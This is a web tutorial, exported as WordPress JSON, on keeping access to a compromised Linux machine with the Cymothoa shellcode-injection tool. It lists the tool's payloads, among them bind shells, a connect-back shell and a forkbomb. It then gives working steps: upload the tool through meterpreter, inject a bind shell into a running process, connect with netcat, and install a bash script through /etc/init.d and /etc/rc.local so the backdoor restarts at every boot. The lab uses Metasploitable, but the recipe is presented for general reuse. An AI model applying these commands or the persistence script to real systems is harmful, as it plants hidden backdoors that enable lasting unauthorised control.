{"id":246,"date":"2018-07-09T11:41:06","date_gmt":"2018-07-09T06:11:06","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=246"},"modified":"2018-07-09T11:41:06","modified_gmt":"2018-07-09T06:11:06","slug":"cymothoa","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/cymothoa\/","title":{"rendered":"Maintaining Access to a Linux Machine Using Cymothoa &#8211; Post Exploitation"},"content":{"rendered":"<p style=\"text-align: justify;\">Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shellcodes to running processes in a system. Almost all nix systems most of the Linux variants can be backdoored with cymothoa.<\/p>\n<p style=\"text-align: justify;\">Cymothoa uses ptrace library in nix systems to evaluate running processes &amp; inject shellcodes. The greatest advantage of this tool is that we need not create a separate process for the backdoor. While a process is running itself, we can infect a process and start a backdoor. Say for example, if we exploited a web server, hell sure apache2 or httpd or nginx or whatever the web server program is, will be turned on during boot. So we try to inject cymothoa to such service daemons &amp; automate its start during boot. Let&#8217;s see it in action, but first, learn a bit about cymothoa<\/p>\n<p>Homepage: <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/cymothoa.sourceforge.net\/\" target=\"_blank\" rel=\"noopener\">http:\/\/cymothoa.sourceforge.net\/<\/a><\/span><\/p>\n<h2><strong>Options<\/strong><\/h2>\n<pre><strong>Syntax<\/strong>: cymothoa -p &lt;pid&gt; -s &lt;shellcode_number&gt; [options]<\/pre>\n<pre><strong>Main options:<\/strong>\n\t-p\tprocess pid\n\t-s\tshellcode number\n\t-l\tmemory region name for shellcode injection (default \/lib\/ld)\n\t  \tsearch for \"r-xp\" permissions, see \/proc\/pid\/maps...\n\t-m\tmemory region name for persistent memory (default \/lib\/ld)\n\t  \tsearch for \"rw-p\" permissions, see \/proc\/pid\/maps...\n\t-h\tprint this help screen\n\t-S\tlist available shellcodes\n\n<strong>Injection options (overwrite payload flags):<\/strong>\n\t-f\tfork parent process\n\t-F\tdon't fork parent process\n\t-b\tcreate payload thread (probably you need also -F)\n\t-B\tdon't create payload thread\n\t-w\tpass persistent memory address\n\t-W\tdon't pass persistent memory address\n\t-a\tuse alarm scheduler\n\t-A\tdon't use alarm scheduler\n\t-t\tuse setitimer scheduler\n\t-T\tdon't use setitimer scheduler\n\n<strong>Payload arguments:<\/strong>\n\t-j\tset timer (seconds)\n\t-k\tset timer (microseconds)\n\t-x\tset the IP\n\t-y\tset the port number\n\t-r\tset the port number 2\n\t-z\tset the username (4 bytes)\n\t-o\tset the password (8 bytes)\n\t-c\tset the script code (ex: \"#!\/bin\/sh\\nls; exit 0\")\n\t  \tescape codes will not be interpreted...\n<strong>Payloads<\/strong>\n\n0 - bind \/bin\/sh to the provided port (requires -y)\n1 - bind \/bin\/sh + fork() to the provided port (requires -y) - izik &lt;izik@tty64.org&gt;\n2 - bind \/bin\/sh to tcp port with password authentication (requires -y -o)\n3 - \/bin\/sh connect back (requires -x, -y)\n4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)\n5 - script execution (see the payload), creates a tmp file you must remove\n6 - forks an HTTP Server on port tcp\/8800 - http:\/\/xenomuta.tuxfamily.org\/\n7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com\n8 - forkbomb (just for fun...) - Kris Katterjohn\n9 - open cd-rom loop (follows \/dev\/cdrom symlink) - izik@tty64.org\n10 - audio (knock knock knock) via \/dev\/dsp - Cody Tubbs (pigspigs@yahoo.com)\n11 - POC alarm() scheduled shellcode\n12 - POC setitimer() scheduled shellcode\n13 - alarm() backdoor (requires -j -y) bind port, fork on accept\n14 - setitimer() tail follow (requires -k -x -y) send data via upd<\/pre>\n<h3><strong>Lab: Inject Backdoor into a Compromised Linux System<\/strong><\/h3>\n<p style=\"text-align: justify;\"><strong>Scenario<\/strong>: We have an attacker system running Kali linux with IP 192.168.0.103, a target Linux system(metasploitable 2.0) with IP 192.168.0.102. The story continues after the victim is exploited. I have already got a meterpreter shell connected to the victim.<\/p>\n<p style=\"text-align: justify;\">I will explain in brief the procedure for this. Take a look at the following figure.<\/p>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_249\" aria-describedby=\"caption-attachment-249\" style=\"width: 301px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa-flow\/\" rel=\"attachment wp-att-249\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-249\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png\" alt=\"cymothoa\" width=\"301\" height=\"1024\" \/><\/a><figcaption id=\"caption-attachment-249\" class=\"wp-caption-text\">Post Exploitation &amp; Backdooring Procedure with cymothoa.<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Yes, that is the algorithm. I want you to understand the procedure rather than just copying the steps. We first exploit the system gain access to it. Then the rest is all about Maintaining access.<\/p>\n<p style=\"text-align: justify;\">Then we can try uploading the existing cymothoa binary(\/usr\/bin\/cymothoa or \/usr\/share\/cymothoa) to the target &amp; try executing it. But it failed for me all the time. So if it does, proceed to step 3 below. If it doesn&#8217;t, don&#8217;t worry, we have access to the system, we will download a new copy &amp; install it.<\/p>\n<p style=\"text-align: justify;\">After installation, try executing it. If the cymothoa banner comes, then the installation is successful. After this, we try infecting a running process &amp; see if we can get a connection. Mostly this will succeed. If it doesn&#8217;t just try it with another process. But the problem with this is it only lasts for the present &amp; not for the future.<\/p>\n<p style=\"text-align: justify;\">Meaning, if the process dies or the system is rebooted, we won&#8217;t get the backdoor running. For this, we create a shell script and edit some boot time configurations in the victim &amp; make a process infected each time the system starts or reboots. Thus we can have a persistent backdoor.<\/p>\n<p><em>Enough Talk, Lets Attack!<\/em><\/p>\n<p><strong>Step 1: Download Cymothoa &amp; Upload it to Victim<\/strong><\/p>\n<p>Download the latest version from the link below using the web browser in Kali Linux attacker machine.<\/p>\n<p>Download Link: <span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/sourceforge.net\/projects\/cymothoa\/files\/cymothoa-1-alpha\/\" target=\"_blank\" rel=\"noopener\">http:\/\/sourceforge.net\/projects\/cymothoa\/files\/cymothoa-1-alpha\/<\/a><\/span><\/p>\n<figure id=\"attachment_250\" aria-describedby=\"caption-attachment-250\" style=\"width: 948px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa11\/\" rel=\"attachment wp-att-250\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-250\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa11.png\" alt=\"cymothoa\" width=\"948\" height=\"434\" \/><\/a><figcaption id=\"caption-attachment-250\" class=\"wp-caption-text\">Cymothoa being Downloaded in Kali Linux Attacker machine.<\/figcaption><\/figure>\n<p>The default location is \/root\/Downloads. Remember this.<\/p>\n<p style=\"text-align: justify;\">Now I have a meterpreter session running(How to gain access in Exploitation section.). Upload the downloaded archive to the victim. Optionally you can also download it directly to the victim (if you know).<\/p>\n<pre>meterpreter &gt; upload Downloads\/cymothoa&lt;press tab&gt; &lt;space&gt; \/root\/\nmeterpreter &gt; shell\ncommand: tar -xvf cymothoa&lt; Enter full name here, Pressing tab key Doesen't work&gt;<\/pre>\n<figure id=\"attachment_251\" aria-describedby=\"caption-attachment-251\" style=\"width: 724px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa1\/\" rel=\"attachment wp-att-251\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-251\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa1.png\" alt=\"cymothoa\" width=\"724\" height=\"398\" \/><\/a><figcaption id=\"caption-attachment-251\" class=\"wp-caption-text\">Uploading the archive to the victim.<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p>Note: Every time you drop into a shell from meterpreter, the shell has limited capabilities. Tab key doesn&#8217;t work &amp; vim doesn&#8217;t return a display. It crashes if we open something in vim or nano.<\/p>\n<p><strong>Step 2:<\/strong> <strong>Install Cymothoa &amp; Execute.<\/strong><\/p>\n<p>While we are in the shell. Change directory to the location we uploaded the archive and give execute permissions. Then execute the &#8220;Makefile&#8221;.<\/p>\n<pre>command cd &lt;location&gt; \ncommand: chmod +x cymothoa&lt;full name&gt; -R \ncommand: .\/Makefile<\/pre>\n<figure id=\"attachment_252\" aria-describedby=\"caption-attachment-252\" style=\"width: 422px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa2\/\" rel=\"attachment wp-att-252\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-252\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa2.png\" alt=\"cymothoa\" width=\"422\" height=\"269\" \/><\/a><figcaption id=\"caption-attachment-252\" class=\"wp-caption-text\">Change permissions<\/figcaption><\/figure>\n<p>Now try to execute the file. Remember to be in the directory where you uploaded the archive.<\/p>\n<pre>Command: .\/cymothoa<\/pre>\n<figure id=\"attachment_253\" aria-describedby=\"caption-attachment-253\" style=\"width: 687px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa3\/\" rel=\"attachment wp-att-253\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-253\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa3.png\" alt=\"cymothoa\" width=\"687\" height=\"381\" \/><\/a><figcaption id=\"caption-attachment-253\" class=\"wp-caption-text\">Cymothoa Installed<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><strong>Step 3: Infect a running process.<\/strong><\/p>\n<p>Now find the processes running in the system &amp; note the process id (pid).<\/p>\n<pre>command: ps -e<\/pre>\n<figure id=\"attachment_254\" aria-describedby=\"caption-attachment-254\" style=\"width: 272px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa4\/\" rel=\"attachment wp-att-254\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-254 size-medium\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa4-272x300.png\" alt=\"Cymothoa\" width=\"272\" height=\"300\" \/><\/a><figcaption id=\"caption-attachment-254\" class=\"wp-caption-text\">Running Processes in the victim<\/figcaption><\/figure>\n<p>Now, infect the process with cymothoa.<\/p>\n<pre>syntax: .\/cymothoa -p &lt;pid&gt; -s &lt;shellcode number&gt; -y &lt;listening port&gt;<\/pre>\n<pre>command: .\/cymothoa -p 5476 -s 1 -y 100<\/pre>\n<p><em>Tip: Remember to check whether the listening port(-y option) is already in use.<\/em><\/p>\n<p>Now check if the port is open<\/p>\n<pre>command: netstat -l | grep 100&lt;your port here&gt;<\/pre>\n<figure id=\"attachment_255\" aria-describedby=\"caption-attachment-255\" style=\"width: 678px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa5\/\" rel=\"attachment wp-att-255\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-255\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa5.png\" alt=\"cymothoa\" width=\"678\" height=\"327\" \/><\/a><figcaption id=\"caption-attachment-255\" class=\"wp-caption-text\">Infecting a process with Cymothoa<\/figcaption><\/figure>\n<p>&nbsp;<\/p>\n<p><strong>Step 4<\/strong>: <strong>Try a netcat connection from the attacker machine.<\/strong><\/p>\n<p>Open up a new terminal in Kali Linux attacker system &amp; initiate a netcat connection to the port we specified<\/p>\n<pre>command: nc 192.168.0.102 100 &lt;give your victim ip &amp; port&gt;<\/pre>\n<figure id=\"attachment_260\" aria-describedby=\"caption-attachment-260\" style=\"width: 300px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa12\/\" rel=\"attachment wp-att-260\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-260\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa12-300x70.png\" alt=\"cymothoa\" width=\"300\" height=\"70\" \/><\/a><figcaption id=\"caption-attachment-260\" class=\"wp-caption-text\">Netcat Connection to Cymothoa Backdoor<\/figcaption><\/figure>\n<p>There you have&#8230;!<\/p>\n<p><strong>Step 5<\/strong>: <strong>Prepare script, upload it &amp; set up execution.<\/strong><\/p>\n<p style=\"text-align: justify;\">This is the hard part. If you have any idea about shell scripting you can understand. Or else try to learn some. Anyway, the script is very simple. It first extracts the pid of a service or a daemon. Checks if it is a number or not.<\/p>\n<p style=\"text-align: justify;\">Sometimes a process will have child processes. So there will be more than one pids available. In that case it is essential to extract one pid alone from a list of pids. Then the script assigns the pid to a variable (say q here). Then executes cymothoa with value of the variable q as the value for the &#8220;-p&#8221; option. Here is the script.<\/p>\n<pre>#!\/bin\/bash\np=`cat \/var\/run\/crond.pid`\n<span style=\"color: #99cc00;\">#extracts the pid. Here replace the last with a process of your desire.\n#example: p=`cat \/var\/run\/apache2.pid`.\n#Remember the chracter before cat &amp; after pid is a backtick &amp; not an inverted comma.<\/span>\nif [ \"$p\" -eq \"$p\" ] 2&gt;\/dev\/null; then <span style=\"color: #99cc00;\">#checks whether it's a number or not.<\/span>\nq=$p\nelse\nq=`(echo $p | awk '{print $2}')` #takes the next row which will be a number. Here also it's a backtick\nfi\necho $q\nexec \/cymothoa-1-alpha\/cymothoa -p $q -s 1 -y 100 <span style=\"color: #99cc00;\"># make sure to give absolute path of cymothoa in the victim.<\/span>\nexit<\/pre>\n<p>Things to note:<\/p>\n<ul>\n<li>When assigning the output of a command to a variable, a backtick is used.<\/li>\n<li>Always give absolute &amp; full paths whenever needed.<\/li>\n<li>You can choose any service. A service which is likely to start at boot like apache2\/crond\/vsftpd\/mysqld etc is appropriate.<\/li>\n<li>Pid location is standard unix systems is &#8221; \/var\/run\/process.pid &#8220;.<\/li>\n<li>Make sure the listening port(-y option) will be unused by other services. Giving port 80 will be a bad idea if it&#8217;s a web server.<\/li>\n<\/ul>\n<p>Copy the script to a file in the kali linux machine. Edit it accordingly and save it.<\/p>\n<figure id=\"attachment_256\" aria-describedby=\"caption-attachment-256\" style=\"width: 745px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa6\/\" rel=\"attachment wp-att-256\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-256 size-large\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa6-1024x508.png\" alt=\"cymothoa\" width=\"745\" height=\"370\" \/><\/a><figcaption id=\"caption-attachment-256\" class=\"wp-caption-text\">The Script<\/figcaption><\/figure>\n<p>Drop back to meterpreter shell by pressing <span style=\"color: #ff6600;\">Cntrl+c<\/span> &amp; upload the script to \/etc\/init.d<\/p>\n<pre>meterpreter&gt; upload cym.sh \/etc\/init.d\/ &lt;replace cym.sh by your filename&gt;<\/pre>\n<p>Drop to the shell again by giving shell command &amp; change permissions.<\/p>\n<pre>meterpreter&gt; shell \nchmod +x \/etc\/init.d\/cym.sh &lt;replace by your file&gt;<\/pre>\n<figure id=\"attachment_257\" aria-describedby=\"caption-attachment-257\" style=\"width: 535px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa7\/\" rel=\"attachment wp-att-257\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-257\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa7.png\" alt=\"cymothoa\" width=\"535\" height=\"169\" \/><\/a><figcaption id=\"caption-attachment-257\" class=\"wp-caption-text\">Uploading the Script<\/figcaption><\/figure>\n<p style=\"text-align: justify;\">Now is the big part. We have to enable the script to run during boot time. this is simple, just add an entry to \/etc\/rc.local. But vim or nano will not be available.<\/p>\n<p style=\"text-align: justify;\">Also if we cat the file(rc.local) there is a statement &#8220;exit 0&#8221; at the end. Any statements appended after this will not be executed. So we have to cut the last line, append our new line &amp; then append the old exit line.<\/p>\n<pre>command: sed -i '$d' \/etc\/rc.local \ncommand: echo \"sh \/etc\/init.d\/cym.sh\" &gt;&gt; \/etc\/rc.local \ncommand: echo \"exit 0\" &gt;&gt; \/etc\/rc.local<\/pre>\n<p>Ensure it by<\/p>\n<pre>command: tail \/etc\/rc.local<\/pre>\n<figure id=\"attachment_258\" aria-describedby=\"caption-attachment-258\" style=\"width: 726px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa9\/\" rel=\"attachment wp-att-258\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-258\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa9.png\" alt=\"cymothoa\" width=\"726\" height=\"418\" \/><\/a><figcaption id=\"caption-attachment-258\" class=\"wp-caption-text\">Editing the Configuration<\/figcaption><\/figure>\n<figure id=\"attachment_259\" aria-describedby=\"caption-attachment-259\" style=\"width: 723px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/kalilinuxtutorials.com\/ma\/cymothoa\/attachment\/cymothoa10\/\" rel=\"attachment wp-att-259\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-259\" src=\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/cymothoa10.png\" alt=\"cymothoa\" width=\"723\" height=\"490\" \/><\/a><figcaption id=\"caption-attachment-259\" class=\"wp-caption-text\">Editing the Configuration<\/figcaption><\/figure>\n<p>Note: Here also give absolute paths when writing it to the rc.local file.<\/p>\n<p>All SET..!<\/p>\n<p>Now while in the shell, issue<\/p>\n<pre>command: \/etc\/init.d\/rc.local start<\/pre>\n<p style=\"text-align: justify;\">If every step were right, you got it. Then try netstat while within the shell &amp; see if the port is listening. If you are permitted, reboot the machine so that the shell &amp; meterpreter session dies. Open a netcat to the victim after some time. You will be amazed.<\/p>\n<p style=\"text-align: justify;\">Phew ! That was long but you will get very good results. I had to do a lot of research for each steps in the process &amp; would definitely like your feedback. Try this out &amp; please subscribe, comment &amp; follow this blog everywhere.<\/p>\n<p><em>References:<\/em><\/p>\n<p><span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"https:\/\/nixos.org\/nix\/\" target=\"_blank\" rel=\"noopener\">https:\/\/nixos.org\/nix\/<\/a><\/span><\/p>\n<p><span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/www.cyberciti.biz\/faq\/unix-linux-bsd-appleosx-bash-assign-variable-command-output\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.cyberciti.biz\/faq\/unix-linux-bsd-appleosx-bash-assign-variable-command-output\/<\/a><\/span><\/p>\n<p><span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/beginlinux.com\/server\/ubuntu\/how-to-run-scripts-at-ubuntu-startup\" target=\"_blank\" rel=\"noopener\">http:\/\/beginlinux.com\/server\/ubuntu\/how-to-run-scripts-at-ubuntu-startup<\/a><\/span><\/p>\n<p><span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/scx020c07c.blogspot.in\/2012\/09\/backdooring-using-cymothoa.html\" target=\"_blank\" rel=\"noopener\">http:\/\/scx020c07c.blogspot.in\/2012\/09\/backdooring-using-cymothoa.html<\/a><\/span><\/p>\n<p><span style=\"color: #3366ff;\"><a style=\"color: #3366ff;\" href=\"http:\/\/stackoverflow.com\/questions\/806906\/how-do-i-test-if-a-variable-is-a-number-in-bash\" target=\"_blank\" rel=\"noopener\">http:\/\/stackoverflow.com\/questions\/806906\/how-do-i-test-if-a-variable-is-a-number-in-bash<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shellcodes to running processes in a system. Almost all nix systems most of the Linux variants can be backdoored with cymothoa. Cymothoa uses ptrace library in nix systems to evaluate running processes &amp; inject [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[34,41],"tags":[72,321,1622,1775,1776,1896,1899,1977,1978,2356,2465,2474,2484,2563,2564,3077,3078,3471,3472],"class_list":["post-246","post","type-post","status-publish","format-standard","hentry","category-pe","category-tuts","tag-access","tag-baackdoor","tag-injection","tag-kali","tag-kali-linux","tag-linux","tag-linux-backdoor","tag-maintain","tag-maintaining-access","tag-os-backdoor","tag-penetration-test","tag-pentest","tag-pentesting","tag-post","tag-post-exploitation","tag-shellcode","tag-shellcode-injection","tag-unix","tag-unix-backdoor"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Maintaining Access to a Linux Machine Using Cymothoa - Post Exploitation - Kali Linux Tutorials<\/title>\n<meta name=\"description\" content=\"Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shell codes to processes.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Maintaining Access to a Linux Machine Using Cymothoa - Post Exploitation - Kali Linux Tutorials\" \/>\n<meta property=\"og:description\" content=\"Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shell codes to processes.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-09T06:11:06+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png\" \/>\n<meta name=\"author\" content=\"Ravi Sankar\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ravi Sankar\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\"},\"author\":{\"name\":\"Ravi Sankar\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/fc7a437fea63fdc097205621071d5545\"},\"headline\":\"Maintaining Access to a Linux Machine Using Cymothoa &#8211; Post Exploitation\",\"datePublished\":\"2018-07-09T06:11:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\"},\"wordCount\":1292,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png\",\"keywords\":[\"access\",\"baackdoor\",\"injection\",\"kali\",\"kali linux\",\"linux\",\"linux backdoor\",\"maintain\",\"maintaining access\",\"os backdoor\",\"penetration test\",\"pentest\",\"pentesting\",\"post\",\"post exploitation\",\"shellcode\",\"shellcode injection\",\"unix\",\"unix backdoor\"],\"articleSection\":[\"Post Exploitation\",\"Tutorials\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/cymothoa\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\",\"name\":\"Maintaining Access to a Linux Machine Using Cymothoa - Post Exploitation - Kali Linux Tutorials\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png\",\"datePublished\":\"2018-07-09T06:11:06+00:00\",\"description\":\"Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shell codes to processes.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/cymothoa\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/cymothoa\/#primaryimage\",\"url\":\"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png\",\"contentUrl\":\"http:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2015\/06\/Cymothoa-Flow-301x1024.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/fc7a437fea63fdc097205621071d5545\",\"name\":\"Ravi Sankar\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8dfaba25f81ff33d5b8723d63285a6eaaedfef1c82c23e370efb0a3fe2054613?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8dfaba25f81ff33d5b8723d63285a6eaaedfef1c82c23e370efb0a3fe2054613?s=96&d=mm&r=g\",\"caption\":\"Ravi Sankar\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ravisankar\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Maintaining Access to a Linux Machine Using Cymothoa - Post Exploitation - Kali Linux Tutorials","description":"Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shell codes to processes.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/cymothoa\/","og_locale":"en_US","og_type":"article","og_title":"Maintaining Access to a Linux Machine Using Cymothoa - Post Exploitation - Kali Linux Tutorials","og_description":"Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shell codes to processes.","og_url":"https:\/\/kalilinuxtutorials.com\/cymothoa\/","og_site_name":"Kali Linux 